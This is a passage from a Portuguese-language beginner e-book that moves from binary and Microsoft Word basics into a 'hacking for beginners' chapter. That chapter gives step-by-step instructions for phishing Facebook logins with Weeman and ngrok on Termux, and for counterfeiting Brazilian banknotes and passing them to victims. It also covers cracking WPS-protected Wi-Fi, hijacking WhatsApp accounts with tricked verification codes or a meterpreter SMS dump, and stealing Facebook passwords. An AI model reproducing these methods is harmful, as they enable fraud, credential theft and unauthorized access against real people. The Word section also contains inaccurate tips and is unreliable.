eu digito no mesmo?” bom primeiro eu quero falar oq e binário: Binário propriamente dito e a
linguagem do computador por exemplo o computador não fala a nossa língua português e nem
outra ex: inglês etc... ele fala a linguagem binário 010101001 basicamente as “letras” são só
01 tipo se vc digitar a letra “T” no teclado o computador vai processar e vai traduzir para ele
entender como 01000001 sendo que esses números representam a letra “T” e assim
sucessivamente e depois ele vai fazer todo aquele processamento e vai mandar pro monitor.

Página 35 de 58
Introdução à microsoft Word 2016
Olá parabéns você chegou nessa parte do livro é isso ai já percebi que você é esforçado mas se
você leu todos os capítulos você saberia me responder oq é os anonymous? E qual a diferença
entre hardware e software? Bom é claro que eu não vou responder e acredito eu se você leu
tudo com atenção até aqui você saberia me responder! Mas se você não sabe safadinho e
safadinha você está me enganando. Mas voltando ao assunto primeiro vamos ver oq é o
Microsoft word.

Definição
O MicroSoft Word é um processador de texto que coloca à disposição do utilizador um
conjunto bastante completo de potencialidades para a criação de um documento.

Basicamente ele serve para editar texto por exemplo eu tô fazendo esse livro no Microsoft
word 2016 e vale ressaltar aqui que para aprender a utilizar o Word não é só entrar e mexer
você pelo menos deve fazer um curso básico e ir praticando para o seu melhor aprendizado e
eu admito que se eu não tivesse feito alguns cursos de Word em empresas por aí eu não teria
a mínima ideia de como fazer esse livro mas você lendo essa parte desse capítulo você saberá
a utilizar o word mais do que muitas pessoas que fizeram um curso básico.

Iniciar o Word
Bom, se você tem um pc (computador pessoal) você pode pesquisar ele e depois clicar nele
que ele irá iniciar. Mas você que não tem um computador a Microsoft disponibiliza ele para
dispositivos móveis por exemplo celular e tablets sendo que você pode baixar ele na playstore
se não me engano.

Criar documentos com modelos


Modelos como o próprio nome diz são alguns documentos já prontos para utilização como por
exemplo o currículo básico que nele vem tudo explicado desde oq deve colocar e como colocar
e tem a página em branco que você pode utilizar ela se você sabe oq fazer e como fazer e tem
vários outros documentos vale ressaltar aqui que os modelos do Word 2016 são pré instalados
ou seja você precisa baixar eles pois nas versões anteriores ao baixar o programa os modelos
já vinha instalado.

Página 36 de 58
Barras e guias
Guias do Word 2016:
Bom, as guias são: ex: pagina inicial, inserir, design, layout, E assim por diante essas guias já
tem algumas ferramentas alguns recursos predefinidos.

A imagem acima mostra as guias que se encontra na parte azul desde arquivos até a opção
diga-me oq você quer fazer. Depois de nós sabermos oq e guias do Word que tal estudarmos
cada uma?!

Página Inicial
Onde eu começo o meu trabalho que é tipo de fonte modificação de parágrafo estilos.

Inserir
Onde eu vou tá inserindo recursos dentro do Word vamos supor eu quero inserir uma imagem
eu devo ir na guia inserir se eu quero inserir uma tabela eu vou na guia inserir e tal tudo que
eu quero colocar dentro do Word eu vou na guia inserir.

Design
Eu trabalho na partes de cores.

Layout
E o layout da nossa página então de acordo com oq eu preciso eu vou na guia correspondente.

Barras de status
Na parte inferior (de baixo) nos temos aqui a barra de status que são algumas informações
como número de página quantas páginas nos temos e qual que nos estamos número de
palavras qual que é o idioma que nos estamos utilizando então nesse caso são algumas
Informações.

Como personalizar componentes


O primeiro botão que vai ter e o botão de salvar que é uma coisa que acontece
constantemente dentro de um texto.

Página 37 de 58
Anote:

No Word português o atalho dentro do Word para salvar e “ctrl B” o “b” e de backup.

Então outro botão que já vem na barra e o desfazer e repetir.

Anote:

Ctrl R=repetir

Ctrl Z=desfazer

Mas não para por aí a barra de cima e totalmente personalizável.

Observe na imagem acima que ao lado dos botões salvar ,desfazer e repetir tem o botão
“Personalizar barra de ferramenta de acesso rápido” então aí você pode desligar e colocar
qualquer um e ainda você pode ir em mais opções se não tiver a opção desejada.

Como personalizar a interface


1° arquivo, 2°opções,3°geral, tema do Office (colorido ,cinza ,escura ,branco o padrão e
colorido.

Página 38 de 58
Exemplo de interface cinza: exemplo de interface branca:

Importante saber:

No final da barra você tem o “diga-me oq vc quer fazer”. Para acessar ele tem a tecla de atalho
“ALT, G” e ele vai ir no diga-me oq vc quer fazer.

O alt se você aperta e soltar o ribboson aparece com as opções que você quer usar sem utilizar
o mouse ex: 1° alt,2° C,= Ele vai pra página Inicial.

Anote:

As teclas de atalho para editor de


texto são muito importantes pois
evitam que você tire a mão do
teclado para mexer no mouse.

Barra de rolagem e navegação


Barra de rolagem ao lado direito nos
temos a nossa barra de rolagem.

Página 39 de 58
Zoom
Se eu clicar no sinal de menos (-) Ele vai diminuir o meu zoom se eu clicar no sinal de mais (+)
Ele vai aumentando l meu zoom.

Anote:

O zoom ele não altera o tamanho da impressão, apenas o da visualização.

Formatação de parágrafos
Anote:

O alinhamento justificado e recomendando para todo documento que será impresso.

Anote:

Ctrl + J e o atalho utilizado para justificar o texto.

Centralizar título
Bom, centralizar título e colocar no meio.

Observe a imagem a seguir

Um erro que as pessoas fazem ao centralizar título e apertar espaço. Isso é errado pois existe
uma maneira muito fácil que é selecionar o título depois clicar em justificar.

A imagem a seguir mostra onde fica essa opção:

Dicas :

Para fazer títulos


igual use o pincel
de formação e
para colocar
documentos em
outras páginas use
a tecla de atalho
“ctrl enter”.

Bom isso e só uma introdução a Microsoft word e algumas dicas sendo que não é um curso de
Word básico então eu acredito que você sabendo isso já está de bom tamanho.

Página 40 de 58
Você sabia?

As teclas de atalho por finalidade ajudar no uso do programa sem utilizar o mouse. Tornando
assim mais rápido o manuseio e muito importante saber as teclas de atalho para tornar o seu
trabalho mais rápido vamos a algumas.

Observe os exemplos na imagem a seguir:

Página 41 de 58
Capítulo 6-Hacking para iniciantes
Técnicas de invasão:

Resumo:

Autor: Helexiel Wireless

Com a chegada da internet as redes de computadores não param de crescer, o que traz novas
tecnologias, e consequentemente, novas vulnerabilidades. Qualquer dispositivo que tenha
acesso à internet está sujeito a sofrer diversos tipos de ataques, muitas vezes causando
prejuízos e danos enormes às vítimas. O objetivo desse capítulo é mostrar algumas técnicas de
invasão e como executar sendo que nesse capítulo de técnicas de invasão do volume 1 não
tem nada de avançado.

Página 42 de 58
Técnicas de invasão
Introdução
A Internet surgiu em 1969, nos laboratórios de pesquisa dos Estados Unidos
ARPAnet (ARPA - Advanced Research Projects Agency), a qual era uma rede interna do
Departamento de Defesa Norte-Americano e se tornou pública a partir da década de 1990, e
tem crescido bastante nos últimos anos. A cada dia, a sociedade está mais dependente das
tecnologias, as pessoas não conseguem mais viver sem água, luz e agora sem internet. O
sucesso da Internet mudou consideravelmente as rotinas do mundo todo, trazendo prós e
contras desse mundo virtual como também é chamado o espaço cibernético ou cyberspace.
Ele é formado por uma rede de computadores interconectada, onde tramitam informações de
todo planeta. Porém, nesse espaço onde milhares de pessoas trabalham todos os dias, surgiu
também a insegurança, que pode ser descrita como as vulnerabilidades, ameaças e pragas
virtuais. Muitas empresas começaram a utilizar a rede mundial de computadores para realizar
transações financeiras e comerciais. Com isso, a parte de negócio das organizações ficou mais
suscetível às novas ameaças, além de que novas tecnologias vão surgindo a cada minuto,
sendo em alguns casos embutidas de vulnerabilidades as quais, se exploradas por pessoas
indevidas, podem causar prejuízos à empresa. Até mesmo sites do governo e grandes
empresas como a Sony (2011), Aplle de acordo com o jornalista Pereira (2012), o grupo
hacker AntiSec divulgou uma série de informações e dados de usuários da Apple têm sofrido
uma série de ataques cometidos por hackers.

Encontrar falhas de segurança num sistema de informação não é uma tarefa fácil,
mas é importante procurar se prevenir de ataques reais. É necessário que seja realizado um
planejamento para monitorar toda infra-estrutura de Tecnologia da Informação (T.I.), para
observar possíveis ataques através de simulações de ataque. É ideal uma abordagem de forma
proativa que identifique as vulnerabilidades existentes, buscando soluções capazes de reduzir
o risco da empresa. Devem ser realizados Testes de Invasão (ou Testes de Penetração ou
Intrusão se referindo ao mesmo termo), o que não deixa de ser um tipo de auditoria, mas com
alguns detalhes que o tornam diferente. A definição básica dele é avaliar a segurança da
informação como um todo, redes, ativos, sistemas, mas essa auditoria é feita com simulação
de forma controlada de um ataque real. Desta forma, tendo o conhecimento do que poderia
ocorrer caso algum hacker o fizesse, garantido assim prevenção dos ativos e também os três
aspectos fundamentais para que um sistema seja considerado seguro: integridade,
confidencialidade e disponibilidade da informação (DIAS, 2002) e (ABNT NBR ISO/IEC
17799:2005).
De acordo com a (ISO/IEC 17799:2005):
• Integridade é a propriedade de salvaguarda da exatidão e completeza de
ativos, ou seja, assegurar que os dados não possam ser alterados por usuários
não autorizados;
• Confidencialidade é a propriedade de que a informação não esteja disponível,
ou seja, revelada a indivíduos, entidades ou processos não autorizados, sendo
assim, é a garantia de que as informações não possam ser acessadas por
usuários não autorizados;
• Disponibilidade é a propriedade de estar acessível e utilizável, sob demanda,
por uma entidade autorizada, ou seja, garante que os recursos estejam
disponíveis aos usuários autorizados.

Importante saber:
Verifique o nível de segurança da sua senha nesse serviço oferecido pela MicroSoft:
https://www.microsoft.com/pt-br/security/pc-security/password-checker.aspx

Página 43 de 58
Tipos de ameaças
Malwares
Significa software malicioso, são pragas virtuais que se instalam nos computadores da vítima,
utilizados por hackers causando danos e roubando de informações, obtendo até mesmo
controle total da máquina invadida, tornando-a zumbis, podendo ser utilizada para
ataques de DDoS (Distributed Denial of Service ). Exemplo de malware: trojan horse (cavalo
de tróia), vírus, worms, são feitos para causar danos nos computadores, os dois últimos
podem se propagar. As aplicações desenvolvidas com falhas de programação (intencional ou
não intencional) também podem ser consideradas malwares.
Vírus
Vírus são programas criados para causar danos ao computador infectado, podendo
danificar o sistema operacional, deixando-o muito lento, até mesmo inutilizável. Tem o poder
de se propagar e infectar outros ativos da rede corporativa, servidores com compartilhamento
de arquivos podem ser afetados e os arquivos deletados automaticamente por essa praga.
Talvez o tipo de ameaça mais conhecido pelas pessoas.
Trojan Horse
Termo proveniente do inglês que significa cavalo de tróia, são programas maliciosos
que compromete a segurança computacional, geralmente é enviado por alguém via e-mail
para que o destinatário clique e execute (FERREIRA, 2008). Muito parecido com vírus,
porém não se auto replica.
Worms
Como o vírus, o worm é um software que se propaga de forma automática, se auto
replica e envia cópias para os computadores conectados à rede. A diferença básica do vírus, é
que o worm não precisa de outro programa para se propagar e multiplicar, enquanto o vírus
precisa de outro programa já infectado para se propagar. O worm explora vulnerabilidades dos
sistemas e programas instalados. As formas de envio dessa praga são: envio de mensagens de
e-mails (correio eletrônico), por mensagens via Windows Live (antigo MSN), compartilhamento
de arquivos na rede, etc. Além disso, não é necessário que seja executado, pela sua
característica de se auto propagar infectando a vítima, por exemplo, ao inserir um pendrive
que esteja infectado em um computador, irá executar automaticamente podendo afetar assim
até mesmo o processamento de CPU da máquina, e até mesmo tornando-a zumbis para
realizar ataques. (CERT.br, 2012).
Spywares
São programas que funcionam como um espião, o qual monitora as atividades do
computador infectado e envia informações ao seu criador sem o consentimento do usuário.
Está muito relacionado a propagandas (conhecidas como adware), e muitas vezes vêm
embutidas em outros programas freeware. Um exemplo de spyware são os keyloggers,
programas capazes de capturar as teclas digitadas do computador infectado e enviar
automaticamente ao invasor.
Engenharia Social
É a arte de explorar o fator humano para obter informações precisas dos próprios
colaboradores para poder realizar ataques. Segundo a cartilha de segurança CERT.Br,
“Engenharia social é um método de ataque onde alguém faz uso da persuasão, muitas vezes
abusando da ingenuidade ou confiança do usuário, para obter informações que podem ser
utilizadas para ter acesso, não autorizado, a computadores ou informações”.

Página 44 de 58
Acesso a sites e spam
Esse termo é utilizado para os e-mails que recebemos sem que tenhamos solicitado,
geralmente esses e-mails são enviados para uma grande quantidade de pessoas. A utilização
dessa técnica está diretamente ligada a ataques à segurança, sendo um dos métodos
preferidos dos invasores para propagar códigos maliciosos, disseminação de golpes e roubo de
informações. Para prevenir esse tipo de ataque, as seguintes medidas podem ser adotadas.

• Cuidado quando o campo "assunto" traz textos alarmantes, atraentes ou vagos demais,
como: Você ganhou..., Parabéns! Você foi..., Conta em atraso, Comprovante de depósito etc.

• Observe sempre o remetente do e-mail, hackers costumam tentar enganar as pessoas


mudando o endereço, como:@caixa.com ao invés de @caixa.gov.br.

• Não clique em links e nem baixe anexos de e-mails enviados por remetentes que você
desconhece.

Diariamente acessamos diversos sites e às vezes nem percebemos se o endereço que está
sendo acessado é um endereço verdadeiro. Invasores utilizam a técnica de phishing para
realizar a falsificação de sites. O phishing de site é uma cópia fiel de determinado site, só que
com um endereço inválido. A próxima imagem mostra um exemplo de phishing. A maneira de
prevenir esse tipo de ataque é sempre observar a URL que está sendo acessada. Através do
phishing o site falsificado pode capturar login, senha, informações pessoais e até o número do
cartão de crédito.

Página 45 de 58
Ataques à confidencialidade e integridade

Uma forma de ter acesso às informações sem a devida permissão é interceptar tudo que passa
pela rede, sem que o usuário perceba. Ataques como Man-in-the-Middle-Attack(Ataque
Homem no Meio) e DNS poisoning(Envenenamento DNS) utilizam esse conceito para capturar
informações sem que o usuário saiba. Dependendo do objetivo do atacante, as informações
que chegam até ele podem ser alteradas, prejudicando a integridade das informações.

As seguintes medidas podem ser adotadas para evitar esse tipo de ataque:

• Sempre que possível, acesse sites que utilizem o protocolo HTTPS, principalmente quando
trat-se de transações financeiras.

• Monitore seu servidor DNS, caso a quantidade de requisições esteja baixa, pode ser um sinal
de tentativa de ataque;

• Não utilize hub na sua rede, dê preferência à utilização de switchs;

• Não se conecte em rede Wireless que você não conheça.

Página 46 de 58
Pishing/termux
Olá primeiramente eu queria agradecer ao meu amigo Imesfeno da shelzykode pois ele me
ajudou muito na criação desse pequeno tutorial então eu espero que vocês entendam o passo
a passo mas deixando de papo furado vamos ao tutorial.

Baixe o termux na Play Store_ _~https://play.google.com/store/apps/details?id=com.termux~,


dps de baixado entre no site da ngrok e crie uma conta ~https://ngrok.com/~, depois de criada
entre no termux iremos instalar o Weeman, digite cada comando por vez e não se preocupe só
precisará instala esses repositórios uma vez,_ _(→ *pkg upgrade, pkg install python2 -y, pkg
install git -y, pkg install clone -y* ←), depois de instalado de um *ls* em seguida do *cd
weeman* em seguida do *chmod +x weeman.py* em seguida *ls*, pronto seu Weeman já foi
instalado com sucesso para executa-lo só digitar *python2 weeman.py* você precisa executar
ele dentro da pasta ~cd weeman~ ou não_ _funcionará, agora vamos configurar seu *Ngrok*
pra isso abra um gerenciador de arquivos complexo e que sejam bom eu recomendo o *És Filé
Explore* ele se encontra facilmente na *Play Store* agora vamos pra configuração, volte no
site do ngrok vá na opção 3 aonde começa com *./ngrok authtoken* e copie tudo, copie tudo
somente nessa linha da opção 3, e fassa o download do script do ngrok aonde tá escrito *Linux
(ARM)* depois de baixado vá no *Es Filé Explore* vá nas pastas download e extraia o arquivo
dentro da pasta zipada mesmo não tem problema, agora volte no termux e digite, cada_
_comando por vez, {→ *cd storage, cd downloads* ←} caso não tiver abrindo isso significa que
você deve dar exit no termux e abri-lo novamente e digita, [→ *termux-setup-storage, ls, cd
storage, cd downloads* ←] aí sim vai dá certo, depois de entrado na pasta downloads digite
*cd ngrok-stable-linux-arm* aí depois você digita o comando *chmod +x ngrok* e dar *enter*
e *ls*, agora pra deixa mais fácil você ~entra~ e ~meche~ no ngrok vamos deixa ele na pasta
aonde fica as instalações Github ou seja vai ficar mais fácil pra meche nele só digitando *ls*
pós quando esse comando é utilizado assim que você entra no termux ele mostra todos seus
script em Github principalmente o ngrok, então pra mover o script ngrok da pasta de
downloads pra pasta que acabei de cita digite *mv ngrok
/data/data/com.termux/files/home*_ _apague essa aba do termux agora digitando *exit*
entre de jogo e de ls dado ls cole oque você copiou no site na opção 3 dado comando pronto!
agora toda vez que quiser utilizar o ngrok assim que entra no termux só dá ls que ele vai
aparecer bonitinho, agora com o *NGROK* feito e configurado e *WEEMAN* instalado vamos
fazer o nosso tão famoso *Pishing*, digite clear pra limpar a tela do termux e digite *ls, cd
weeman, python2 weeman.py* abrindo o weeman digite o comando abaixo, mais antes
procure seu site que deseja clonar mas lembrando no site tenque ter opção de cadastro tipo
Facebook ↓_

_*set url http://facebook.com/login*


*set action_url http://facebook.com/login*
*run*_

_Pronto, dado o comando run ele vai cria um Linck mais esse Linck não é pra conexão externa
ele é interna então vamos deixa-la externa, abra outra aba do termux e digite *./ngrok http
8080* agora só espere a conexão pegar quando ela pegar vai ficar verde aí vai tá dois links
abaixo que termina com ~.ngrok.io~, copie o segundo Linck pronto você já pode mandar pra
sua vítima assim que ela entra e conectar com Gmail e Senha e clicar em conectar irá cair num
Facebook de verdade pra ela não desconfia, aí você já pode ir no termux é ir na primeira aba
do weeman só procura que o Gmail e Senha Estarão lá, e_ _pra deixar a pescaria com mais
realista só joga o linnck num encurtador de lincks pronto sua vítima não irá descobrir ou
desconfiar.
Aviso: O autor e nem as pessoas citadas nesse livro se responsabilizam pelos seus atos e pelos
seus danos causados pela intuição.

Página 47 de 58
Usb killer
Você chega à sua mesa no trabalho e se depara com
um pendrive sobre o teclado. Liga seu computador,
espeta o aparelho no USB para ver o que há dentro
dele, e de repente seu PC não funciona mais. Você
pode ter sido vítima de uma das pegadinhas mais
cruéis que a tecnologia pode oferecer: o USB
Killer.

O dispositivo foi revelado ao mundo em março deste


ano pelo pesquisador russo conhecido como “Dark
Purple”, e agora ganhou uma nova versão ainda mais
mortal. Segundo seu criador, O USB Killer 2.0 é capaz
de fritar praticamente qualquer dispositivo com uma
interface USB.

O aparelho se disfarça como um pendrive, mas ele


não tem o menor intuito de guardar arquivos. Sua
única função é armazenar energia para descarregá-la de volta no computador (ou outro
dispositivo com porta USB), potencialmente queimando a máquina. A nova versão usa o dobro
da tensão do que a anterior para fazer seu estrago.

O texto original explicava que, ao conectar o aparelho na porta USB do computador, um


conversor DC/DC invertido carrega os capacitores a -110 volts (agora a -220 volts). Ao chegar
nessa medida, o conversor é desligado, ao mesmo tempo que é aberto um transistor que
descarrega a tensão na porta USB. Quando a carga fica baixa, o conversor volta a funcionar,
até que o estrago esteja completo.

A explicação acima pode parecer muito técnica, mas o resumo da obra é simples. Em termos
leigos, o aparelhinho acumula carga do computador e descarrega de volta no computador com
o intuito de queimar tudo que for possível. Ao devolver a tensão para a fonte de energia, o
USB Killer é capaz de queimar o processador e a placa-mãe do computador. No entanto, é
improvável que o HD seja afetado, o que significa que o processo não é o mais indicado
para quem tem a intenção de eliminar informações de um computador.

Importante saber:
Você pode ver como fazer um usb killer caseiro nesse link: https://youtu.be/JResFSizx6M

Página 48 de 58
Carding: notas fake
PAPEL.Primeiro temos que entender que nenhum papel e 100 parecido com o moeda por o
papel moeda não e feito de madeira então nenhum desses papeis convencionais vão ficar bons
O PAPEL IDEAL E O PAPEL VERGE ele e texturizado...A IMPRESSORA.Bom a impressora eu uso
uma impressora HP multifuncional LaserJet Pro 100 m175nw ela e perfeita para imprimir as
notas por que a tinta dela nao se solta facilmente.ANTI CANETA MAGICA - ÁSPERIDADEBom
isso so funciona se a impressora for boa que não solta tinta.Pegue Shampoo, polvilho, água e
cola misture tudo e coloque polvilho ate fica meio grosso ai com um pincel você vai passando
na nota com isso a caneta magica não pega e a nota fica mais áspera.CONTRA LUZ NEGRA.Bom
pra isso você precisa de alguem que mexa com carimbos de confiança e pede pra fazer um
marimbo com o simbolo da nota quando joga a luz negra ai você compra aqueles pó de boate
que coloca no pulso que so aparece na luz negra adciona um pouco de cola e água so um
pouco e carimba a nada no luga onde as pessoas batem a luz negra Emoticon smile .A
IMPRESSORA IMPRIMIU MUITO CLARO?Bom pra isso você tem que pegar um caderno ou livro
coloca pó de cafe e a nota e deixe por um tempo que logo logo ela estará mais escura.COMO
PREPARAR?Bom pra ela fica mais real um pouco você amassa ela pisa dela e deixa junto com
umas verdadeira e logo ela ficara com textura e cheiro da verdadeira.DICAS DE COMO VIRA AS
FAKES1º (A QUE EU MAIS USO) Vá pra frente de uma casa que não tenha ninguém ai você
pede uma pizza com troco pra 100$ pega o troco e some.2º Vá nesses barzinhos que tem
velhos sempre passa por que andam todos bebados.3º Festas e boates vira muito tbm.4º
Umas das melhores tbm pegue uns 6k e notas e va viaja compre as frutas que eles vendem na
rua para nos pontos de apoio de buzao compra uma coca e vai virando por que com a correria
niguem ver ser a falsa ou nao.
MARCA D'AGUA + 10 COM BRILHO E FAIXA NO MEIO
Bom pessoal não vou da ideia do trampo todo ate por que as partes mais dificieis eu coloquei
aqui mostrando como ser mais tem nego que tudo mastigado (NÃO QUEREM AS NOTAS
PRONTA JA NAO?)
DICA : O BRILHO E FEITO COM GLITER E FERRO DE PASSAR
TAMANHO DAS NOTAS DA NOVA E ANTIGA FAMILIAANTIGAS2 reais – 14,0 x 6,5 cm.5 reais –
14,0 x 6,5 cm.10 reais – 14,0 x 6,5 cm.20 reais – 14,0 x 6,5 cm.50 reais – 14,0 x 6,5 cm.100 reais
– 14,0 x 6,5 cm.
NOVAS
2 reais – 12,1cm x 6,5 cm;5 reais – 12,8cm x 6,5 cm;10 reais – 13,5cm x 6,5 cm;20 reais –
14,2cm x 6,5 cm;50 reais – 14,9cm x 7,0 cm;100 reais – 15,6cm x 7,0 cm;

Lucky Patcher
Bom, eu não vou poder falar sobre o Lucky patcher pós minha vida tá uma correria e tô
pretendendo terminar esse livro logo então o máximo que eu posso dizer é que com o Lucky
patcher da pra você hackear jogos mas vale destacar que ele não hackeia todos.

Você pode ver como ele funciona nesse Link: http://membros-


88.blogspot.com/2015/09/como-usar-o-lucky-patcher-em-5-passos.html?m=1

Página 49 de 58
Como hackear wi-fi
HACKEA WIFI BRUTEFORCE
Galera si é isso que vocês realmente quer é importante que leia pois o aplicativo WPS fica
basicamente é uma balança a dúvida sobre esse aplicativo ser ou não fake é muito grande isso
porque tanto os que já teve resultados quanto os que não conseguiram não sabem nem como
funciona e isso que espero ajudar vocês nesse material tirar as dúvidas e quebra de vez esse
gelo espero que gostem.

PRIMEIROS PASSOS
Pra quem quer hackear wi-fi não tem muito segredo já que os aplicativo só conseguem
hackear redes com WPS disponível basta instalar ligar o WPSFILTRE pra filtra apenas redes
vulnerável e tenta si conectar nas redes.

COMO FUCIONA?
Os aplicativos de wps tem os pin inicial de cada roteador por isso facilita a conexão você deve
está si perguntando mas como assim? Calma já vou explicar quando alguém compra um
roteador wi-fi quais são as primeiras coisa que irão fazer? Óbvio colocar o nome da rede e uma
senha 98% das pessoas não sabe oq e WPS ou pra que serve. Na maioria das vezes a opção
WPS fica ativada sem a pessooa saber ou basicamente não liga muito já que o wi-fi está com
senha e acha que está protegido(a) e ninguém poderá acessar sem permissão.

Ai que entra os aplicativos de WPS os aplicativos tem em si os pin inicial de cada roteador. Mas
como assim pin inicial? Quando você compra um roteador wi-fi ele já vem com um nome as
vezes com uma senha e um pin. E basicamente e esse pin que nossos aplicativos tem que
permitir fazer uma conexão rápida e fácil em qualquer wi-fi que tenha wps aberto. No caso
WPS disponível os aplicativos de wps são conhecidos como bruteforce que permite fazer a
conexão através de varias tentativas. No Caso Você deve tentar mais de uma vez.

OQUE E WPS?
Como já citado, a função WPS grava direto no roteador um código de oito dígitos. Acontece
que esse código é muito inseguro e vulnerável. Qualquer ataque de força bruta, ou seja,
que faça sucessivas tentativas de acertar a senha, descobre a combinação de caracteres
em questão de poucas horas.

Na Internet, com uma simples pesquisa é possível encontrar programas que exploram essa
vulnerabilidade e descobrem a senha WPS de seu roteador com sucesso. Vale destacar
que, ao entrar na rede Wi-Fi de uma pessoa, você ganha acesso não apenas a Internet,
mas também a todos os dados que passam pela rede e aos arquivos que são compartilhados

PORQUÊ NÃO TENHO RESULTADOS?


Certamente você já usou quase todos aplicativos de WPS mas não teve resultados mesmo
tentando nas redes com WPS disponível. E julga bastante esse método a ser fake kkk vamos
com calma eu também já passei por isso e já briguei muito quando as pessoas falavam que
conseguiu resultados. Mas eu cansei de brigar e como não tinha certeza si era ou não fake
resolvi da uma segunda chance e agora tô passando esse conhecimento pra vocês. Você deve
tá si perguntando mas eae porque não tenho resultados já tentei de tudo.

Página 50 de 58
Si você Não teve resultados mesmo nas redes com WPS disponível oq acontece e que o
roteador do seu vizinho já e antigo ele deve ter trocado a senha várias vezes restaurado etc... e
com isso até alterado o pin.Mas aí que entra a opção manual cada aplicativo de wps tem a
opção de colocar o pin manualmente porém e um método que exige paciência porque não irá
acerta de primeira aí já vai depende da sorte. Mas como pega os pin?
Na google tem vários sites que disponibilizam alguns desses pin e eu deixarei uns sites no final
desse tutorial pra vocês. Caso não queira pesquisa por pin basta baixa algum aplicativo de wps
diferente. Já que todos funcionam da mesma forma só muda a opção de pin.

APLICATIVOS WPS
Wps wpa Premium: http://apkbox.in/apk/download-wpsxcvbvxcb/#download

WpsApp pro: https://www.androidapkbaixar.com/wpsapp-


pro/com.themausoft.wpsapppro/downloading.ht
Ml

Androdumper: https://play.google.com/store/apps/details?id=com.bigos.androdumpper

Wps Connect: https://play.google.com/store/apps/details?id=com.ngb.wpsconnect

Wifi wps: https://play.google.com/store/apps/details?id=com.berkinalex.wifiwps

Wps PinGen: https://play.google.com/store/apps/details?id=wifi.es.wpspingenerator

Wifi warden: https://play.google.com/store/apps/details?id=com.xti.wifiwarden

•SITE PRA GERA OU PEGA PIN•

http://wpspinleri.blogspot.com.br/p/huawei.html?m=1

Página 51 de 58
Como hackear whatsapp
Bom primeiramente existe uma maneira de hackear whatsapp muito conhecida mas que
geralmente as pessoas chamam isso de clonar eu prefiro falar que é hackear pois é uma forma
de burlar mas o objetivo desse assunto não é discutir então vou apresentar aqui como
funciona esse método.

Método 1
Observe a imagem abaixo:

Observe que depois que você entrar no Whatsapp e ir na opção “mudar número” vai abrir uma
nova tela que é essa apresentada abaixo:

Depois de ler tudo clique em “avançar” e irá abrir uma nova tela que no caso e essa abaixo:

Página 52 de 58
Bom aqui vai uma Dica antes de fazer isso baixe o app parallel space na
play store bom esse App serve para você ter duas contas whatsapp ele
também serve pra outras coisas mas você sabendo isso já tá bom então
vamos lá.

Observe a imagem abaixo:

Bom feito o que eu disse acima o Whatsapp vai pedir um código de verificação pra você provar
que vc é o dono do número que você disse então e aí que entra a engenharia social você pode
dizer algo como “Olá eu tô participando de uma promoção e ela só e válida daqui a 1 hora
então como eu não tenho chip no meu cllr escolhi o seu então vc vai me enviar o número ou
vai mandar print “ bom esse é só um exemplo não é um dos melhores mas a maioria dos
hackers que eu conheço tenta por outros jeitos como por exemplo se passando por uma
mulher e pegando confiança e depois pede o codigo mas usam outro tipo de mensagem para
convencer a vítima.

Método 2
Esse método eu descobrir sem ninguém me dizer bom e tipo assim existe alguns apps que
com eles vc pode fazer Um número fake(falso) como esse +37121095**** e com ele da Pra
você cadrastar no Whatsapp bom eu ia ensinar como se faz número fake e cadrasta no
Whatsapp mas não me deixaram eu ensinar então se você quiser aprender pesquise no
YouTube então basicamente esse método funciona assim eu percebi que existem em vários
grupos pessoas pedindo pra alguém fazer um número fake pra elas pq elas não sabem e até
Pessoas perguntando como que se faz um número fake então eu pensei se eu dizer que vou

Página 53 de 58
dar um número fake pra elas e depois fazer no meu cllr e mandar o código e depois espera-se
alguns dias e fizesse o login no Whatsapp nesse mesmo número eu teria acesso ao whatsapp
dessa pessoa lógico mas apenas se ela n tivesse colocado a verificação em duas etapas.

Método 3
Como clonar o whats da pessoa que não colocou a verificação em duas etapas:

É só mandar um backdoor pra ela! Colocar pra criar um whats novo no seu celular,
colocar o número dela, e quando chegar o codigo no celular dela, vc entra no meterpreter e
dar um dump de SMS do celular dela, dai é só procurar o codigo e ser feliz.

Método 4
Esse método eu descobrir faz pouco tempo e também ele é o melhor que eu (Helexiel) criei
então eu fiz esse algoritmo em descrição narrativa para o seu melhor aprendizado.

Algoritmo “Hackear Whatsapp por engenharia social”

Algoritmo em descrição narrativa:

Faça amizade com a pessoa, Diga que você não sabe criar número fake e que queria que essa
pessoa (Vítima) criasse um numero fake para você e desse o código de verificação para
você( Invasor), Espere a pessoa fazer o número fake mas de preferência faça um gmail e
entregue e diga para ela fazer o número fake nesse gmail pois eu acredito que ela vai te achar
ingênua pois da para pegar seu IP só sabendo o gmail, então após a pessoa criar o número
fake, Você precisa ter em mãos o número do Whatsapp dela mas vale destacar aqui que o
número precisa:

•Ser do Brasil( Ou que ela tenha esse número no cllr (pc etc...).

•Esse número precisa estar cadastrado no Whatsapp.

Então, Após a vítima te dizer o número fake que ela criou, Você terá que ter o parallel space
( Serve para ter duplas contas de whatsapp face etc..)no seu dispositivo, Depois terá que
colocar o número não fake no parallel e pede ligação além do código de sms, Bom depois você
tem que pede o código que chegou na ligação, A pessoa pode mandar e não mandar mas se
ela mandar com certeza ela penso que esse código era do número fake que ela tinha criado
mas não era.

Obs: Existe outros métodos como o keylogers.


Como hackear facebook
Existe alguns métodos ou melhor vários um deles muito conhecido e ir na opção de esqueci
minha senha. Outro é por phishing e outro é por keylogers e outra é fazendo bruteforce por
exemplo você estuda sobre a vida de João e tem vários dados dele como: Data de
nascimento ,onde mora, Nome da mãe e do pai, nome do cachorro, cor preferida etc...
praticamente vc vai fazer um exposed dele e depois vai tentar descobrir a senha por tentativa
e erro ou seja por forcebrute(força bruta) ou seja vai fazer uma lista de possíveis senhas e
depois ir no Facebook e tentar acertar tipo vc descobriu o CPF
dele e vc vai no Facebook dele e coloca o gmail e tal e depois na
parte da senha você coloca o CPF dele e vc acertou. um outro
método e ligando para operadora e falar que você quer
recuperar seu número.

Página 54 de 58
Bom outro método que eu gostei e que descobrir atualmente é por gravador de tela. Como o
próprio nome já diz ele grava sua tela digamos que alguma pessoa peça pra entrar no face dela
pelo seu cllr e depois ela vai sair do face dela e talvez vai deixar o acesso liberado pra vc certo?
Na maioria das vezes não pois vai pede senha então pelo gravador de tela vc pode ver a senha
que ele(a) digita. Praticamente a vítima nem vai saber que vc tá gravando a tela pois em alguns
apps tem a opção de ocultar.

Uma curiosidade
Sobre o tema

Página 55 de 58
Bônus:
Idealizador do projeto anonymous Brasil: Imperador strik

Idealizador do projeto hacking para iniciantes: Helexiel Wireless

Autor: Helexiel Wireless

Página 56 de 58
Co autor: Veloz feroz

Salve: Licisdark, Speaker, Xabael, kratos solitário, imesfeno.

